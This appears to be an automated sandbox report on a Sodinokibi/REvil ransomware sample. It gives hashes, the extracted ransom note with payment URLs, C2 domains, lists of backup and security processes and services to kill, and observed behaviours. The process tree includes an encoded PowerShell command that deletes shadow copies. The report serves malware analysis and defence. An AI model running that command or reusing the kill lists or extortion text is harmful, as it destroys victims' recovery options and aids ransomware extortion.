Analysis

  • max time kernel
    4294179s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7-20220311-en
  • submitted
    19-03-2022 19:58

General

  • Target

    412e951a350b84f8c0d0a2db79029b4bbd6be624656f2a739db0fc00c6dbb52f.exe

  • Size

    822KB

  • MD5

    4c811aa6fa4b6c24e325b0d71b84f710

  • SHA1

    389666ea397b3c51aeb147c8abb504c40b906d62

  • SHA256

    412e951a350b84f8c0d0a2db79029b4bbd6be624656f2a739db0fc00c6dbb52f

  • SHA512

    c33ccb7ed3c6a34d38fde8d824316012bc094abf7f62aad4472a00622500cd7a58cce43a13a26d8680d409a6a779ff36369669f97f91eea8ee50bcfd63f6fa3d

Malware Config

Extracted

Path

C:\6836h-readme.txt

Ransom Note
---=== Welcome. ===--- Merry Christmas and Happy Holidays everyone! You have a great opportunity to enter the new year, leaving all the bad in the outgoing year. I advise you to write to us as soon as possible and not waste your precious time that you can spend with your family. With our decryptors recovery will take you the least time, without us you will have a very hard time and some of your files will not be recovered never. The longer you think, the harder it will be for us to negotiate with you . Waiting for your dialogues in our chat, below you can get acquainted with what happened. [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 6836h. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E41BCDC1AC234364 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/E41BCDC1AC234364 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: ZR3jIkxI+0JnpexriFfAbDm8dB2x5eAcldRW6qCL/Gl57u965dypPfSjR9I6cYSx f6j5v0iYCo1zjDDXolBhTXi5nJ8QVS+kP5C19Zt5o1QnlucAqE7+l0bxmQs3Nx6x ZaocP3gJX5GgTNAW1//ALKp6YzYFPYnZTRPn3sLmuV2s1iEdPbo4yYNMfgqtJgA7 jf5DvSLTkRCCA9E3zPawqmyKZah/0t+49Rs+JRIyKTta81n/z8fQTnnQkPieqZZV KWFvaW7FxW7nhyml0n+1jhWHSNci8Q7yEW1jnTon0UyoPK3AD4KOOZm/z84Hh/mH pIK2TALT69G6L6Wx41ooHrlt9XWaDpb7/N+jzpD8UzLJykAfEhInxeAa/B8jCNzp VOC1OQe1AWPDwzFwRVY5V2cVGGz6xwin5PkhiqY7SyucO80qfkKs9gRW06GSEKsO 8OiIQYWuHMqxPNcL6BTgckua78KwLTcJ+C7tnyPwd6FE3i3mM/AUOszFdxAw22ZX BcprW1H85qUmom24FO7hm9E4Hq0ieMFuUl0Dh9mlU1iLlXmjX+uSC1no3D+sKNJE xFJ2soZKJ8adtL3sIpkQ3ddvOLpvW2DvN1OPzAhO7eL4QO8eeMJMFgOqttLBxof+ HNqgLN96kgsmc/iGMkOLnwIhtVuBe1ME7kkVBu5VzCRM8FgbzKQT64kHhQhUPWid uDZCmaBF+dDUxd61NSOzEwOoB4cFI+0xex3ikMeqU6yHE44stAFGtOTxocigupqK mIZVKv4R2bY0VU2I0h3HcFGB9Sgf0U56FfQwyu8iVg26PLhVZZama3rY+wkcdtox vcVfdLF/k98ozhgk09mMCst2DGlj+XK+ICnq7HfC9SA/oRWB/OZtrTnuOPZE6zMK A81dBSaY08foQ385nUztXLBRXeXEp/H6ewjEvTehA3bDltDQVT0UrCyAtGuk1G5d Uzb/QRdn3G2/Jwp7Pls88dBwivutFFhs/oekZXqdqin/Tf3ZOKjK94byTT3y7yf+ hW9t5sIsmxAkzVIsQlZgRLTvbeVXJSK9brDhCSPeGBqpArw1WwyP+7C8cvgxg+nk Sc2lb0UJn+0GgZVbff1BYcGGb6sqMD75bh7ojp8JF+pbxfv4UCNSMMJxz/CgRUNY lIo= Extension name: 6836h ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!! For google: Revil/Sodinokibi
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/E41BCDC1AC234364

http://decryptor.top/E41BCDC1AC234364

Extracted

Family

sodinokibi

Botnet

26

Campaign

2361

C2

jacquesgarcianoto.com

csaballoons.com

buerocenter-butzbach-werbemittel.de

martha-frets-ceramics.nl

edvestors.org

mediogiro.com.ar

annenymus.com

circuit-diagramz.com

linkbuilding.life

endstarvation.com

nalliasmali.net

domaine-des-pothiers.com

floweringsun.org

haus-landliebe.de

mac-computer-support-hamburg.de

block-optic.com

gsconcretecoatings.com

osn.ro

vedsegaard.dk

grupoexin10.com

Attributes
  • net

    false

  • pid

    26

  • prc

    wordpad

    vxmon

    CagService

    visio

    synctime

    xfssvccon

    VeeamNFSSvc

    dbsnmp

    tbirdconfig

    thunderbird

    firefox

    VeeamDeploymentSvc

    sqbcoreservice

    thebat

    powerpnt

    vsnapvss

    agntsvc

    sql

    raw_agent_svc

    excel

    infopath

    pvlsvr

    mydesktopqos

    beserver

    ocssd

    EnterpriseClient

    winword

    outlook

    onenote

    oracle

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome. ===--- Merry Christmas and Happy Holidays everyone! You have a great opportunity to enter the new year, leaving all the bad in the outgoing year. I advise you to write to us as soon as possible and not waste your precious time that you can spend with your family. With our decryptors recovery will take you the least time, without us you will have a very hard time and some of your files will not be recovered never. The longer you think, the harder it will be for us to negotiate with you . Waiting for your dialogues in our chat, below you can get acquainted with what happened. [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} Extension name: {EXT} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!! For google: Revil/Sodinokibi

  • sub

    2361

  • svc

    sophos

    veeam

    vss

    AcronisAgent

    BackupExecJobEngine

    AcrSch2Svc

    BackupExecManagementService

    BackupExecVSSProvider

    mepocs

    stc_raw_agent

    bedbg

    MSExchange$

    MSExchange

    MVArmor

    CAARCUpdateSvc

    memtas

    MSSQL$

    BackupExecAgentBrowser

    PDVFSService

    WSBExchange

    sql

    ARSM

    svc$

    VeeamNFSSvc

    BackupExecRPCService

    CASAD2DWebSvc

    VeeamTransportSvc

    VeeamDeploymentService

    backup

    MVarmor64

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 4 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\412e951a350b84f8c0d0a2db79029b4bbd6be624656f2a739db0fc00c6dbb52f.exe
    "C:\Users\Admin\AppData\Local\Temp\412e951a350b84f8c0d0a2db79029b4bbd6be624656f2a739db0fc00c6dbb52f.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1616
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1452
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1976
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1988

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1452-57-0x000007FEFBF51000-0x000007FEFBF53000-memory.dmp
      Filesize

      8KB

    • memory/1452-58-0x000007FEF36A0000-0x000007FEF41FD000-memory.dmp
      Filesize

      11.4MB

    • memory/1452-60-0x00000000026FB000-0x000000000271A000-memory.dmp
      Filesize

      124KB

    • memory/1452-59-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp
      Filesize

      9.6MB

    • memory/1452-61-0x00000000026F0000-0x00000000026F2000-memory.dmp
      Filesize

      8KB

    • memory/1452-62-0x000007FEF5B10000-0x000007FEF64AD000-memory.dmp
      Filesize

      9.6MB

    • memory/1452-63-0x00000000026F2000-0x00000000026F4000-memory.dmp
      Filesize

      8KB

    • memory/1452-64-0x00000000026F4000-0x00000000026F7000-memory.dmp
      Filesize

      12KB

    • memory/1616-54-0x0000000076851000-0x0000000076853000-memory.dmp
      Filesize

      8KB

    • memory/1616-55-0x0000000000370000-0x00000000003B9000-memory.dmp
      Filesize

      292KB

    • memory/1616-56-0x0000000000400000-0x00000000004D5000-memory.dmp
      Filesize

      852KB